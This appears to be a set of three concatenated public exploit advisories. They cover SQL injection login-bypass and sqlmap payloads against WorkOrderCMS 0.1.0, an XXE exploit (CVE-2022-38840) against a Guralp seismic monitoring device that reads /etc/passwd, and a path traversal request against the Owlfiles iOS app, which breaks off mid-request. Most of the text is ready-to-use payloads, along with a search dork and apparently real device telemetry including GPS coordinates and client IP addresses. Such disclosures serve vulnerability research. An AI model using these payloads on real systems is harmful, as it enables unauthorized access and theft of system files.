# Software Link: https://github.com/romzes13/WorkOrderCMS/archive/refs/tags/v0.1.0.zip
# Version: 0.1.0
# Tested on: Linux
# Auth Bypass:
username:' or '1'='1
password:' or '1'='1
#sqlmap -r workorder.req --threads=10 --level 5 --risk 3 --dbs --dbms=mysql
# POST Requests:
Parameter: #1* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: userName=1'='1&password=1/' AND (SELECT 3761 FROM(SELECT
COUNT(*),CONCAT(0x7170627071,(SELECT
(ELT(3761=3761,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- UUhY!1111'/
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: userName=1'='1&password=1/';SELECT SLEEP(5)#!1111'/
Type: time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
Payload: userName=1'='1&password=1/' AND (SELECT 6822 FROM
(SELECT(SLEEP(5)))lYsh)-- YlDI!1111'/
Parameter: #2* ((custom) POST)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP
BY clause (FLOOR)
Payload: userName=1'='1&password=1/!1111' AND (SELECT 2010 FROM(SELECT
COUNT(*),CONCAT(0x7170627071,(SELECT
(ELT(2010=2010,1))),0x71787a7871,FLOOR(RAND(0)*2))x FROM
INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- tqtn/
Type: stacked queries
Title: MySQL >= 5.0.12 stacked queries (comment)
Payload: userName=1'='1&password=1/!1111';SELECT SLEEP(5)#/
Type: time-based blind
Title: MySQL >= 5.0.12 OR time-based blind (SLEEP)
Payload: userName=1'='1&password=1/!1111' OR SLEEP(5)-- XuTW/
# Exploit Title: MAN-EAM-0003 V3.2.4 - XXE
# Date: 2022-09-19
# Exploit Author: Ahmed Alroky
# Author: http://guralp.com/
# Version: 3.2.4
# Authentication Required: NO
# CVE : CVE-2022-38840
# Google dork: " webconfig menu.cgi "
# Tested on: Windows
# Exploit
1 - browse to http://<Host<http://%3cHost> name>/cgi-bin/xmlstatus.cgi
2 - click on "View saved XML snapshot" and upload XML exploit file or paste the exploit code and submit the form
3 - you will get /etc/passwd file content
#XML exploit code
```
<?xml version='1.0'?>
<!DOCTYPE replace [<!ENTITY example SYSTEM "file:///etc/passwd"> ]>
<xml-status xmlns='http://www.guralp.com/platinum/xmlns/xmlstatus/1.1'>
<module status='-1' display-primary='true' path='das' title='Data acquisition'>
<reading status='100' display-primary='false' path='is_faulty'
title='Fault condition'>false</reading>
<reading status='-1' display-primary='false' path='dsp_tag'
title='DSP code tag'>platinum</reading>
<reading status='-1' display-primary='false' path='dsp_version'
title='DSP code version'>102</reading>
<reading status='100' display-primary='true' path='dsp_state'
title='Acquisition hardware module'>running</reading>
<reading status='-1' display-primary='true' path='reference_clock'
title='Reference clock type'>GPS</reading>
<reading status='100' display-primary='false' path='clock_controller'
title='ADC clock controller state'>FLL</reading>
<reading status='-1' display-primary='false' path='clock_control_val'
title='ADC clock controller value'>46196</reading>
<reading status='100' display-primary='true' path='clock_locked'
title='ADC clock locked'>true</reading>
<reading status='-1' display-primary='true' path='clock_last_locked'
title='ADC clock last locked at'>2022-06-14T11:26:53Z</reading>
<reading status='100' display-primary='true' path='clock_phase_error' units='s'
title='ADC clock phase error'>6.1e-08</reading>
</module>
<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.0' title='Sensor A'>
<reading status='100' display-primary='true' path='state'
title='Current state'>running</reading>
<reading status='-1' display-primary='true' path='last_action_time'
title='Last action timestamp'>never</reading>
<reading status='-1' display-primary='true' path='last_action'
title='Last action'></reading>
<reading status='96' display-primary='true' path='mass_Z'
title='Z mass position'>4.6%</reading>
<reading status='100' display-primary='true' path='mass_N'
title='N mass position'>-0.3%</reading>
<reading status='100' display-primary='true' path='mass_E'
title='E mass position'>-0.3%</reading>
</module>
<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.1' title='Sensor B'>
<reading status='100' display-primary='true' path='state'
title='Current state'>running</reading>
<reading status='-1' display-primary='true' path='last_action_time'
title='Last action timestamp'>never</reading>
<reading status='-1' display-primary='true' path='last_action'
title='Last action'></reading>
</module>
<module status='-1' display-primary='true' path='das-in.sensor.DONB..TM.X' title='Auxiliary'>
<reading status='100' display-primary='true' path='state'
title='Current state'>running</reading>
<reading status='-1' display-primary='true' path='last_action_time'
title='Last action timestamp'>never</reading>
<reading status='-1' display-primary='true' path='last_action'
title='Last action'></reading>
</module>
<module status='-1' display-primary='true' path='gcf-out-scream.default' title='Scream server (GCF network sender)'>
<reading status='100' display-primary='true' path='total_blocks'
title='Total number of blocks sent'>11374055</reading>
<reading status='100' display-primary='true' path='last5_blocks'
title='Number of blocks sent in last 5 minutes'>331</reading>
<reading status='-1' display-primary='false' path='port_number'
title='Port listening on'>1567</reading>
<reading status='-1' display-primary='true' path='num_clients'
title='Number of clients connected'>0</reading>
<list status='-1' display-primary='true' path='clients' title='Clients'>
</list>
</module>
<module status='-1' display-primary='false' path='gdi-base.default' title='Default data transport daemon'>
<reading status='100' display-primary='true' path='num_channels'
title='Number of channels'>16</reading>
<reading status='100' display-primary='true' path='num_clients'
title='Number of connected clients'>5</reading>
<reading status='100' display-primary='true' path='num_samples'
title='Number of samples received'>7338920142</reading>
<reading status='100' display-primary='true' path='last5_samples'
title='Number of samples in last 5 minutes'>213600</reading>
<list status='-1' display-primary='false' path='clients' title='Clients'>
<list-item status='-1' display-primary='false' path='44B02216' title='Client #1'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>gdi2gcf[default]</reading>
</list-item>
<list-item status='-1' display-primary='false' path='1CC104A5' title='Client #2'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>gdi-link-tx[default]</reading>
</list-item>
<list-item status='-1' display-primary='false' path='9D9E4553' title='Client #3'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>gdi2miniseed[default]</reading>
</list-item>
<list-item status='-1' display-primary='false' path='4B1427EC' title='Client #4'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>das-in</reading>
</list-item>
<list-item status='-1' display-primary='false' path='412FD3EB' title='Client #5'>
<reading status='-1' display-primary='false' path='name'
title='Client name'>das-in-textstatus</reading>
</list-item>
</list>
<list status='-1' display-primary='false' path='channels' title='Channels'>
<list-item status='-1' display-primary='false' path='38B5E770' title='Channel #1'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HHZ.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='7B77F21B' title='Channel #2'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HHN.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='B55019F4' title='Channel #3'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HHE.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='35ED217B' title='Channel #4'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HDF.TM.X0</reading>
</list-item>
<list-item status='-1' display-primary='false' path='8062D6AB' title='Channel #5'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HNZ.TM.10</reading>
</list-item>
<list-item status='-1' display-primary='false' path='2099C9F1' title='Channel #6'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HNN.TM.10</reading>
</list-item>
<list-item status='-1' display-primary='false' path='DE833721' title='Channel #7'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.HNE.TM.10</reading>
</list-item>
<list-item status='-1' display-primary='false' path='5510ED44' title='Channel #8'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.MMZ.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='ACFA260E' title='Channel #9'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.MMN.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='5BED382E' title='Channel #10'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.MME.TM.00</reading>
</list-item>
<list-item status='-1' display-primary='false' path='67453FF7' title='Channel #11'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.SOH.TM.0</reading>
</list-item>
<list-item status='-1' display-primary='false' path='1D34DF0D' title='Channel #12'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB-AIB</reading>
</list-item>
<list-item status='-1' display-primary='false' path='A11AEDBA' title='Channel #13'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.SOH.TM.1</reading>
</list-item>
<list-item status='-1' display-primary='false' path='2DBCFF6E' title='Channel #14'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB-BIB</reading>
</list-item>
<list-item status='-1' display-primary='false' path='9D7CDB17' title='Channel #15'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB.SOH.TM.X</reading>
</list-item>
<list-item status='-1' display-primary='false' path=' 8A3C070' title='Channel #16'>
<reading status='-1' display-primary='false' path='name'
title='Channel name'>DONB-XIB</reading>
</list-item>
</list>
</module>
<module status='-1' display-primary='true' path='gdi-link-tx.default' title='System gdi-link transmitter'>
<reading status='100' display-primary='true' path='total_bytes_sent' units='bytes'
title='Total number of bytes sent'>11273973132</reading>
<reading status='100' display-primary='true' path='last5_bytes_sent'
title='Number of bytes sent in last 5 minutes'>325518</reading>
<reading status='100' display-primary='true' path='tx_rate'
title='Transmit rate over last 5 minutes'>1085.06</reading>
<reading status='-1' display-primary='false' path='port_number'
title='Port listening on'>1565</reading>
<reading status='100' display-primary='true' path='num_clients'
title='Number of clients'>0</reading>
<list status='-1' display-primary='true' path='clients' title='Clients'>
</list>
</module>
<module status='-1' display-primary='true' path='gdi2gcf.default' title='GCF compressor. Default instance'>
<reading status='100' display-primary='true' path='num_samples_in'
title='Total number of samples in'>7439096490</reading>
<reading status='100' display-primary='true' path='last5_samples_in'
title='Number of samples in in last 5 minutes'>216516</reading>
<reading status='100' display-primary='true' path='num_blocks_out'
title='Total number of blocks out'>11374055</reading>
<reading status='100' display-primary='true' path='last5_blocks_out'
title='Number of blocks out in last 5 minutes'>331</reading>
<list status='-1' display-primary='false' path='channels' title='Channels'>
<list-item status='-1' display-primary='true' path='10D33176' title='DONB.HHZ.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AZ0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='39355EAD' title='DONB.HHN.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AN0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:46.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path=' 380425E' title='DONB.HHE.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AE0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:45.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='E6EAF8A3' title='DONB.HDF.TM.X0'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-XX0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:35.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='45B1141C' title='DONB.HNZ.TM.10'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BZ0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:48.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path=' 9951403' title='DONB.HNN.TM.10'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BN0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:42.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='3B38B4CE' title='DONB.HNE.TM.10'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>100</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BE0</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:26:40.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'>1</reading>
</list-item>
<list-item status='-1' display-primary='true' path='3E12CA7F' title='DONB.MMZ.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>4</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AM8</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:24:48.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='F194038D' title='DONB.MMN.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>4</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AM9</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:23:47.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='80F951F3' title='DONB.MME.TM.00'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>4</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AMA</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'>2022-06-14T11:23:57.000000000Z</reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path=' DCFFBA' title='DONB.SOH.TM.0'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-A00</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='F2D860DE' title='DONB-AIB'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-AIB</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='8B4D513B' title='DONB.SOH.TM.1'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-B00</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='5CC9B084' title='DONB-BIB'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-BIB</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='B4418B8A' title='DONB.SOH.TM.X'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-X00</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
<list-item status='-1' display-primary='true' path='AB7AFF68' title='DONB-XIB'>
<reading status='-1' display-primary='true' path='sample_rate' units='Hz'
title='Sample rate'>nan</reading>
<reading status='-1' display-primary='true' path='gcf_name'
title='GCF name'>DONB-XIB</reading>
<reading status='-1' display-primary='true' path='last_block'
title='Last block timestamp'></reading>
<reading status='-1' display-primary='false' path='digitiser_type'
title='GCF digitiser type'>CMG-DAS</reading>
<reading status='-1' display-primary='false' path='ttl'
title='GCF tap table lookup'>0</reading>
<reading status='-1' display-primary='false' path='pga'
title='GCF variable gain'></reading>
</list-item>
</list>
</module>
<module status='-1' display-primary='true' path='gdi2miniseed.default' title='Mini-SEED compressor. Default instance'>
<reading status='100' display-primary='true' path='num_samples_in'
title='Total number of data samples in'>6184483152</reading>
<reading status='100' display-primary='true' path='last5_samples_in'
title='Number of samples in last 5 minutes'>180000</reading>
<reading status='100' display-primary='true' path='num_text_in'
title='Total number of text samples in'>0</reading>
<reading status='100' display-primary='true' path='last5_text_in'
title='Number of text samples in last 5 minutes'>0</reading>
<reading status='100' display-primary='true' path='num_ms_rec_out'
title='Total number of Miniseed records out'>22682743</reading>
<reading status='100' display-primary='true' path='last5_ms_rec_out'
title='Number of Miniseed records out in last 5 minutes'>655</reading>
</module>
<module status='-1' display-primary='true' path='gps' title='GPS'>
<reading status='100' display-primary='true' path='have_data'
title='GPS data received'>true</reading>
<reading status='100' display-primary='false' path='last_data'
title='Last data received from GPS'>2022-06-14T11:26:53Z</reading>
<reading status='100' display-primary='true' path='fix'
title='Fix'>3D</reading>
<reading status='100' display-primary='true' path='last_fix'
title='Timestamp of last fix'>2022-06-14T11:26:53Z</reading>
<reading status='-1' display-primary='true' path='latitude' units='°'
title='Latitude'>13.909917</reading>
<reading status='-1' display-primary='true' path='longitude' units='°'
title='Longitude'>100.593734</reading>
<reading status='-1' display-primary='true' path='elevation' units='m'
title='Elevation'>3</reading>
<reading status='100' display-primary='true' path='sv_count'
title='Count of satellites in view'>26</reading>
<reading status='100' display-primary='true' path='sv_used'
title='Count of satellites used in fix'>12</reading>
<reading status='-1' display-primary='true' path='sv_online'
title='Timestamp of last nmea sentence'>2022-06-14T11:26:52Z</reading>
<reading status='100' display-primary='true' path='rs232_detect'
title='RS232 device detect'>true</reading>
</module>
<module status='-1' display-primary='true' path='ntp' title='NTP'>
<reading status='-1' display-primary='false' path='mode'
title='Timing mode'>direct_gps</reading>
<reading status='-1' display-primary='true' path='mode_desc'
title='Timing mode'>NTP is using a GPS reference source.</reading>
<reading status='100' display-primary='true' path='locked'
title='Clock locked'>true</reading>
<reading status='100' display-primary='true' path='estimated_error' units='s'
title='Estimated error'>0.000131</reading>
<reading status='-1' display-primary='true' path='clock_source'
title='Clock source'>GPS</reading>
<reading status='-1' display-primary='false' path='peer'
title='Peer'>127.127.28.1</reading>
<reading status='-1' display-primary='false' path='peer_refid'
title='Peer's reference ID'>GPS</reading>
</module>
<module status='-1' display-primary='true' path='seedlink-out.0' title='SEEDlink network server (instance 1)'>
<reading status='-1' display-primary='true' path='num_records'
title='Total number of records seen'>22682743</reading>
<reading status='100' display-primary='true' path='last5_records'
title='Number of records seen in last 5 minutes'>655</reading>
<reading status='-1' display-primary='true' path='seq'
title='Current sequence number'>3382931</reading>
<reading status='100' display-primary='true' path='num_clients'
title='Number of clients connected'>7</reading>
<list status='-1' display-primary='true' path='clients' title='Clients'>
<list-item status='-1' display-primary='true' path='2DF96A1C' title='Client #1700'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>123.160.221.22</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>21100</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>0</reading>
</list-item>
<list-item status='-1' display-primary='true' path='79C29121' title='Client #3412'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>113.53.234.98</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>33964</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>0</reading>
</list-item>
<list-item status='-1' display-primary='true' path='5060E6FF' title='Client #3581'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>203.114.125.67</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>48666</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3221351</reading>
</list-item>
<list-item status='-1' display-primary='true' path='B1A1AB18' title='Client #3723'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>113.53.234.98</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>45158</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
<list-item status='-1' display-primary='true' path=' 91FC71C' title='Client #3720'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>221.128.101.50</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>55776</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
<list-item status='-1' display-primary='true' path='599CD113' title='Client #3721'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>118.175.2.50</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>60818</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
<list-item status='-1' display-primary='true' path='BAB80847' title='Client #3722'>
<reading status='-1' display-primary='true' path='remote_ip'
title='Remote IP address'>203.114.125.67</reading>
<reading status='-1' display-primary='true' path='remote_port'
title='Remote TCP port'>53984</reading>
<reading status='-1' display-primary='true' path='dialup'
title='Dialup mode'>false</reading>
<reading status='-1' display-primary='true' path='seqno'
title='Last sequence no'>3382931</reading>
</list-item>
</list>
</module>
<module status='-1' display-primary='true' path='storage' title='Storage'>
<reading status='100' display-primary='true' path='state'
title='State'>Inactive</reading>
<reading status='100' display-primary='true' path='recording_state'
title='Recording state'>Last flush good</reading>
<reading status='-1' display-primary='true' path='last_accessed'
title='Last accessed'>2022-06-14T08:10:14Z</reading>
<reading status='-1' display-primary='true' path='free_space_pct'
title='Free space'>27.2%</reading>
<reading status='-1' display-primary='false' path='free_space' units='bytes'
title='Available space'>17449811968</reading>
<reading status='-1' display-primary='true' path='size' units='bytes'
title='Storage size'>64134021120</reading>
<reading status='100' display-primary='false' path='fs_type'
title='Filesystem type'>VFAT</reading>
<list status='-1' display-primary='false' path='clients' title='Clients'>
</list>
</module>
<module status='-1' display-primary='true' path='system' title='Linux system'>
<reading status='-1' display-primary='false' path='serial_number'
title='Serial number'>DAS-405D62</reading>
<reading status='-1' display-primary='true' path='uptime' units='s'
title='System uptime'>10307538</reading>
<reading status='-1' display-primary='true' path='load_average'
title='Load Average'>1.72</reading>
<reading status='100' display-primary='true' path='root_free_space' units='bytes'
title='Root filesystem free space'>437809152</reading>
<reading status='100' display-primary='true' path='root_percent_free_space'
title='Root filesystem percentage space free'>77.0%</reading>
<reading status='-1' display-primary='true' path='build_label'
title='Software repository label'>&example;</reading>
<reading status='-1' display-primary='true' path='build_version'
title='Software build number'>15809</reading>
<reading status='-1' display-primary='true' path='build_machine'
title='Build machine'>CMG-DAS</reading>
<reading status='-1' display-primary='true' path='last_reboot_1'
title='Reboot 1'>2021-04-08T05:06:17Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_2'
title='Reboot 2'>2021-04-08T07:02:50Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_3'
title='Reboot 3'>2021-04-08T08:00:33Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_4'
title='Reboot 4'>2021-04-08T08:30:41Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_5'
title='Reboot 5'>2021-04-08T08:39:15Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_6'
title='Reboot 6'>2021-04-08T08:46:24Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_7'
title='Reboot 7'>2021-04-08T10:08:51Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_8'
title='Reboot 8'>2021-04-09T07:10:41Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_9'
title='Reboot 9'>2021-10-07T06:48:35Z</reading>
<reading status='-1' display-primary='true' path='last_reboot_10'
title='Reboot 10'>2022-02-15T04:14:30Z</reading>
<reading status='100' display-primary='true' path='temperature' units='°C'
title='System temperature'>43.875</reading>
<reading status='100' display-primary='true' path='voltage' units='V'
title='Power supply voltage'>12.75</reading>
<reading status='100' display-primary='true' path='current' units='A'
title='Power supply current'>0.442</reading>
<reading status='100' display-primary='true' path='sensor_A_voltage' units='V'
title='Sensor A voltage'>12.675</reading>
<reading status='100' display-primary='true' path='sensor_A_current' units='A'
title='Sensor A current'>0.289</reading>
<reading status='100' display-primary='true' path='sensor_B_voltage' units='V'
title='Sensor B voltage'>12.725</reading>
<reading status='100' display-primary='true' path='sensor_B_current' units='A'
title='Sensor B current'>0.002</reading>
</module>
</xml-status>
```
# Exploit Title: Owlfiles File Manager 12.0.1 - Multiple Vulnerabilities
# Date: Sep 19, 2022
# Exploit Author: Chokri Hammedi
# Vendor Homepage: https://www.skyjos.com/
# Software Link:
https://apps.apple.com/us/app/owlfiles-file-manager/id510282524
# Version: 12.0.1
# Tested on: iPhone iOS 16.0
###########
path traversal on HTTP built-in server
###########
GET /../../../../../../../../../../../../../../../System/ HTTP/1.1
Host: localhost:8080
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X)
AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e
Safari/8536.25
Accept:
